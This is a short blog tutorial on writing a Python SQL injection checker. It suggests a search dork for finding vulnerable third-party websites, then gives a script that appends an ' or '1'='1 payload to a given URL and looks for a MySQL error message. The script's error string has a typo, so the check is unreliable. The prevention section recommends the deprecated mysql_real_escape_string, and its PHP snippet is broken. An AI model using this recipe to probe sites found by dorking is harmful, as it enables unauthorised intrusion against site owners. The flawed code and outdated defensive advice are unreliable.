It only uses the GET parameters on the website
dependencies:
- python 3.4 or latest
- Internet Connection
- Vulnerability a Website
- Computer with Linux or Windows (here using Linux)
If you're not install python, you can download python in http://python.org/downloads
A Glimpse Of Python
Python is written in C, it is one of the easiest programming languages to hacking tools, it includes a lot of very useful libs.
Finding Vuln Website For Testing
To find a website for testing using simple sqli dorks, like {inurl:"index.php?cat_id="}.
This Simple Code Sqli To Check For Vulnerabilities
Before starting, create new file with format .py e.g: sqli.py
After that, then copy this code to a file that has been created:
import sys
import urllib
import urllib.request
fullurl = input("Please specify the vulnerable url: ")
resp = urllib.request.urlopen(fullurl + "=1\' or \'1\' = \'1\'")
body = resp.read()
fullbody = body.decode('utf-8')
if "You have an error in you SQL syntax" in fullbody:
print ("The website is classic SQL injection vulnerable!")
else:
print ("The website is not classic SQL injection vulnerable!")
Save and running with command $python sqli.py
How to prevent simple SQL injection
Preventing SQLi ON MYSQL if very simple. Just use mysql_real_escape string for queries, as example:
$query = sprintf("SELECT * FROM users where user='%s' AND password='%s',
mysql_real_escape_string($username)
mysql_real_escape_string($password)
So tutorial make a simple code with python Good Luck and may useful, thanks to Vivilius Povilaika
Tidak ada komentar:
Posting Komentar